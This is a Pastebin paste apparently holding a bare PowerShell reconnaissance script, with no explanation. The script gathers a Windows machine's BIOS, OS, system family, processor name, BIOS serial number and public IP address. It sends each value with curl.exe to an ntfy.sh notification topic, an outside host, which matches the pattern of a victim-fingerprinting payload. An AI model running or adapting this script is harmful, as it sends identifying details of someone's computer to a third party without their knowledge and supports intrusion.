Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $n = Get-ComputerInfo
- curl.exe http://ntfy.sh/unzcomin -d $n.bioscaption
- curl.exe http://ntfy.sh/unzcomin -d $n.osname
- curl.exe http://ntfy.sh/unzcomin -d $n.cssystemfamily
- curl.exe http://ntfy.sh/unzcomin -d $n.csprocessors.name
- $sn = wmic bios get serialnumber
- curl.exe http://ntfy.sh/unzcomin -d $sn[2]
- $ipin = curl.exe ipinfo.io/ip
- curl.exe http://ntfy.sh/unzcomin -d $ipin
- exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement